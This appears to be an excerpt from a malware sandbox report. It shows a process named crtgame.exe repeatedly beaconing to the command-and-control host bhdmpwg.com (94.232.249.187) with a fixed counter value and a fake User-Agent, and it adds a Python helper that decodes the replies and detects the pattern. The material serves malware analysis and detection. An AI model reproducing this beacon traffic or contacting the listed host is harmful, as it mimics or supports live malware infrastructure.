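The sessions above all share one shape: a fresh TCP connection from crtgame.exe every one to two seconds, the same 160-character counter value in every GET /click/ request, a User-Agent that claims "Windows NT 9.0", and a chunked reply whose body is a short run of ASCII hex. The following is an added example, not code from the Joe Sandbox report, from the sample, or from its C2: a Python triage helper that decodes the chunked body shown under "Data Raw" and flags that beacon pattern. The User-Agent string and the host bhdmpwg.com are taken from the capture; the shortened counter, the control request and its hostname, the 1.6 s cadence of the sample records, and the 5-session / 5-second thresholds are assumptions made for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# NT versions that shipping Windows releases report in a User-Agent; the
# "Windows NT 9.0" seen in the requests above is not one of them.
KNOWN_NT_VERSIONS = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
NT_RE = re.compile(r"Windows NT (\d+\.\d+)")
BEACON_RE = re.compile(r"GET (/[^?\s]*)\?counter=([0-9a-f]+) HTTP/1\.1$")


def parse_chunked(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coded body into its payload.

    Chunk-size lines are hex and may carry ';name=value' extensions; a
    zero-size chunk ends the body. A truncated capture raises ValueError
    rather than silently yielding a partial payload.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)  # optional trailers are not needed here
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2


def decode_hex_payload(payload: bytes) -> bytes:
    """The server answers with ASCII hex digits; return the bytes they encode."""
    return bytes.fromhex(payload.decode("ascii"))


def claims_unknown_windows(user_agent: str) -> bool:
    """True when the UA names a Windows NT version that no release reports."""
    m = NT_RE.search(user_agent)
    return bool(m) and m.group(1) not in KNOWN_NT_VERSIONS


def find_beacons(records, min_sessions=5, max_gap=timedelta(seconds=5)):
    """Group (session_id, ts, request_line, host, ua) records by
    (host, path, counter) and report groups where one counter value was sent
    on >= min_sessions distinct TCP sessions with no gap longer than max_gap."""
    groups = defaultdict(list)
    for sid, ts, request_line, host, ua in records:
        m = BEACON_RE.match(request_line)
        if m:
            groups[(host, m.group(1), m.group(2))].append((ts, sid, ua))

    findings = []
    for (host, path, counter), hits in groups.items():
        hits.sort()
        sessions = {sid for _, sid, _ in hits}
        gaps = [later[0] - earlier[0] for earlier, later in zip(hits, hits[1:])]
        if len(sessions) < min_sessions or any(g > max_gap for g in gaps):
            continue
        findings.append({
            "host": host, "path": path, "counter": counter,
            "sessions": len(sessions), "requests": len(hits),
            "median_gap_s": sorted(gaps)[len(gaps) // 2].total_seconds() if gaps else 0.0,
            "unknown_windows_version": any(claims_unknown_windows(ua) for _, _, ua in hits),
        })
    return findings


# Constructed sample modelled on the sessions above: one fresh TCP session per
# request, about 1.6 s apart, all carrying the same counter value. The counter
# is a shortened stand-in, not the value from the capture.
SAMPLE_COUNTER = "de7ef49b2c006853fb383e7c6101f041"
SAMPLE_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
_T0 = datetime(2024, 12, 14, 3, 3, 2)
SAMPLE_RECORDS = [
    (sid, _T0 + timedelta(seconds=1.6 * i),
     f"GET /click/?counter={SAMPLE_COUNTER} HTTP/1.1", "bhdmpwg.com", SAMPLE_UA)
    for i, sid in enumerate(range(2, 9))
] + [
    # Control: an ordinary one-off fetch on another session (host is made up).
    (99, _T0 + timedelta(seconds=30), "GET /index.html HTTP/1.1",
     "intranet.example", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
]
# The 220-byte replies' body, exactly what the report's "Data Raw" hex decodes to.
SAMPLE_BODY = b"e\r\nde2ff49a2e1137\r\n0\r\n\r\n"

if __name__ == "__main__":
    payload = parse_chunked(SAMPLE_BODY)
    print(f"payload {payload.decode()} -> {len(decode_hex_payload(payload))} bytes")
    for finding in find_beacons(SAMPLE_RECORDS):
        print(finding)
```

Run directly, it prints the decoded payload (14 hex digits, so 7 opaque bytes per reply; what they mean is not something the capture shows) and one flagged group for bhdmpwg.com. The two signals it keys on are cheap to turn into a network detection: the same query-parameter value re-sent on a new TCP connection every couple of seconds, and a User-Agent claiming a Windows NT version that no Windows release reports.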


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.5  49866        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:22.889854908 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:24.256819010 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:24 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:24.363647938 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:24.859121084 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:24 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.5  49872        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:25.093702078 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:26.438208103 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:26 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.5  49876        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:26.670857906 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:28.022310019 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:27 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.5  49882        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:28.456394911 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:29.808022976 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:29 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.5  49886        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:30.046716928 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:31.399544001 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:31 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.5  49890        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:31.640180111 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:32.982063055 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:32 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.5  49895        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:33.219090939 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:34.569000959 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:34 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:34.675803900 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:35.171402931 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:34 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.5  49901        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:35.406033993 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:36.746660948 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:36 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.5  49905        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:37.038882017 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:38.392321110 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:38 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.5  49911        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:38.625365973 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:39.995623112 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:39 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.5  49915        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:40.233910084 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:41.677377939 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:41 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:41.785342932 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:42.282877922 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:42 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
23          192.168.2.5  49921        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:42.515485048 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:43.859419107 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:43 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
24          192.168.2.5  49926        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:44.094465971 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:45.435652971 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:45 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
25          192.168.2.5  49930        94.232.249.187  80                5460  C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 14, 2024 03:03:45.671370029 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:47.021720886 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:46 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:47.128827095 CET  303                OUT        GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
                                                                   Host: bhdmpwg.com
                                                                   User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:47.629327059 CET  220                IN         HTTP/1.1 200 OK
                                                                   Server: nginx/1.20.1
                                                                   Date: Sat, 14 Dec 2024 02:03:47 GMT
                                                                   Content-Type: text/html; charset=UTF-8
                                                                   Transfer-Encoding: chunked
                                                                   Connection: keep-alive
                                                                   X-Powered-By: PHP/7.4.33
                                                                   Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                   Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49936 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:03:47.859289885 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:49.207911015 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:49.316361904 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:49.820957899 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:49.925767899 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:50.426228046 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49944 | 94.232.249.187 | 80 | 5460 | C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 03:03:50.656239986 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:52.004081011 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
Dec 14, 2024 03:03:52.113394022 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1
Host: bhdmpwg.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 03:03:52.613415003 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 02:03:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370
